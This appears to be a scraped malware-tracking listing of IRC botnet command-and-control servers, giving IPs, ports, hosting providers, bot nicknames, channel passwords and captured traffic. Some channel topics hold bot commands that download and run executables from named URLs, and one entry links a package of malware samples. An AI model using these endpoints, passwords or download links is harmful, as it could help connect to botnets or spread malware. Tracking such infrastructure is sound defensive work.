Remote Host Port Number 50.16.237.200 80 78.47.77.34 80 89.248.164.182 3211 PONG :IRC.Secret.GoV JOIN #Lucid NICK New{USA|XP-SP2|A}6421177 USER 6421177 “” “6421177” :6421177 MODE New{USA|XP-SP2|A}6421177 +iMm PRIVMSG #Msn : 9>>-
92.243.19.35(irc botnet hosted in France Gandi)
Remote Host Port Number 92.243.19.35 1337 NICK [nLh-VNC]eftvsr USER hdadboweq “fo8.net” “rage” :hdadboweq JOIN #VnC# PRIVMSG #VnC# : [RAGE SCAN:] range: 97.x.x.x/94 threads. PONG irc.priv8net.com hosting infos: http://whois.domaintools.com/92.243.19.35
37mb malware samples
Worms,bankers,irc bots inside this package have fun reversing them Download: http://adf.ly/1sSG7
88.86.113.239(irc botnet hosted in Czech Republic Liberec Supernetwork S.r.o)
Remote Host Port Number 88.86.113.239 31092 NICK US|computername USER siruyuse UNIX UNIX :username JOIN #global# JOIN #US Now talking in #global# Topic On: [ #global# ] [ omtECZWQgee3/7w9aGStOwmHmYQVTJXFx68dXRhkVWUhNomgeVieycdUnnRaoait ] Modes On: [ #global# ] [ +smntMu ] hosting infos: http://whois.domaintools.com/88.86.113.239
74.117.174.70(irc botnet hosted in United States Seattle Kwshells Internet Services)
Remote Host Port Number 74.117.174.70 1728 PONG :puc.ssb14e.jp JOIN ##lamer## hosting infos: http://whois.domaintools.com/74.117.174.70
Firewall.yi.org(Mic bot from ccteam hosted in Turkey Istanbul Global Iletisim Hizmetleri A.s)
Resolved : [Firewall.yi.org] To [91.93.117.180] Resolved : [Firewall.yi.org] To [87.236.232.25] Remote Host Port Number 62.219.170.83 80 96.17.109.43 80 91.93.117.180 33725 87.236.232.25 33725 Now talking in #N3t Topic On: [ #N3t ] [ ] Topic By: [ cyber ] hosting infos: http://whois.domaintools.com/91.93.117.180
82.243.195.7(irc botnet hosted in France Nice Free Sas)
Remote Host Port Number 193.107.204.81 6667 WHO #bitcoin83 82.243.195.7 8333 WHO #bitcoin83 NICK x958986756 USER x958986756 8 * : x958986756 USERHOST x958986756 NICK uAoggnooyBzZnpi JOIN #bitcoin83 hosting infos: http://whois.domaintools.com/82.243.195.7
77.79.7.246(ngrBot hosted in Lithuania Splius Uab)
DNS Lookup Host Name IP Address api.wipmania.com api.wipmania.com 213.251.170.52 fullyundetectable.com UDP Connections Download URLs http://213.251.170.52/ (api.wipmania.com) Outgoing connection to remote server: api.wipmania.com TCP port 80 C&C Server: 77.79.7.246:1863 Server Password: Username: iogjzhd Nickname: n{DE|XPa}iogjzhd Channel: #ngr (Password: ngrbot) Channeltopic: :.s .up http://fullyundetectable.com/uploader/1308440076.exe 5f78edacd7147892bb86f7a3e26367d9 .msn.int 5 .msn.set http://img##.lmageshack.org/images/?id=image##.jpg Now talking in #ngr Topic On: [ #ngrRead more...
xvm-9-86.ghst.net(ngrBot hosted in France Gandi)
Remote Host Port Number 213.251.170.52 80 92.243.18.207 80 92.243.18.207 3212 PASS ngrBot 92.243.18.207 4949 PASS ngrBot 92.243.9.86 3211 PASS ngrBot 92.243.9.86 3333 PASS ngrBot Now talking in #nazel Topic On: [ #nazel] [ !NAZEL http://vjestice.fileave.com/46cc323cfb4d5be72a3969dff8338cdf.exe 46CC323CFB4D5BE72A3969DFF8338CDF !NAZEL http://mediahostdata.org/install.52161.exe -r !j -c US,USA,GBR,GB,AUS,AU,CA #ppi ] Topic By: [ DD ] Parts: DD [Mr_DD@HeavenOnEarth] Now talking inRead more...
kayits.byinter.net(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
found by tr0j3n Remote Host Port Number kayits.byinter.net 7107 NICK new[iRooT-XP-USA]667657 USER 3221 “” “TsGh” :3221 JOIN #!MSN! Coded NICK [iRooT-XP-USA]008675 USER 0086 “” “TsGh” :0086 NICK [iRooT-XP-USA]049882 USER 0498 “” “TsGh” :0498 hosting infos: http://whois.domaintools.com/94.102.1.163